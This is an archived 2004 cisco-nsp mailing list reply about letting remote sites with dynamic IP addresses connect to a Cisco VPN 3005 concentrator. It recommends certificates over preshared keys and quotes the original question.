[c-nsp] Dynamic remotes connecting to VPN 3005. Is it possible?
Michael Markstaller
mm at elabnet.de
Mon Sep 27 02:52:17 EDT 2004
In general it's easy possible, but depends on what remotes you have
(VPN3002,IOS,PIX,other?)
The first thing to consider is using certificates, otherwise, depending
on your devices you run into the problems with PSK you mentioned..
Preshared keys are insecure and a bad idea in general, not only
regarding the "dynamic IP" issue.
There was an advisory not so long ago regarding the Groupname/Password
issue caused by weakness of PSK. This only acknowledged what anybody
expected before: VPN3000-stuff with PSK is as vulnerable as PSK is.
Cisco now introduced some Mutual-IKE stuff which is again only a
workaround - using certs is the solution.
But in general on the VPN 3000 it should be possible to seperate peers
even with PSK (Groupname/Password) worst case creating 20 Groups,
although I've never tried - but regarding security it leads to the same
problems.
Michael
> -----Original Message-----
> From: cisco-nsp-bounces at puck.nether.net
> [mailto:cisco-nsp-bounces at puck.nether.net] On Behalf Of Brian Feeny
> Sent: Monday, September 27, 2004 2:31 AM
> To: cisco-nsp at puck.nether.net
> Subject: [c-nsp] Dynamic remotes connecting to VPN 3005. Is
> it possible?
>
>
>
> Does anyone know if its possible to have remote sites, who
> are assigned
> dynamic IP addresses,
> connect to the VPN 3005 (The VPN 3005 would have a static IP address)?
> I know you can put
> all your remotes, in this case 20, into one Base Group and that would
> work, but then they share
> the same IKE password, and so this is not good, because if one
> site/client quits, you must change
> the password at 19 other sties. I want to be able to configure each
> client as its own group/profile
> with its own unique password/key. Lumping all remotes that
> use dynamic
> addressing/dhcp into
> one "Base Group" is not an option for me. Other vendors, like sonic
> wall, can do this very easily
> and so I am sure its probably supported on the cisco vpn concentrator,
> since many remote sites
> that need VPN are behind dynamic ip assignment.
>
> Brian
>
> ---------------------------------------------
> Brian Feeny, CCIE #8036, CISSP
> Network Engineer
> ShreveNet Inc.
>
>
> --- auto-converted to plaintext by ELAB4
>
>
>
More information about the cisco-nsp
mailing list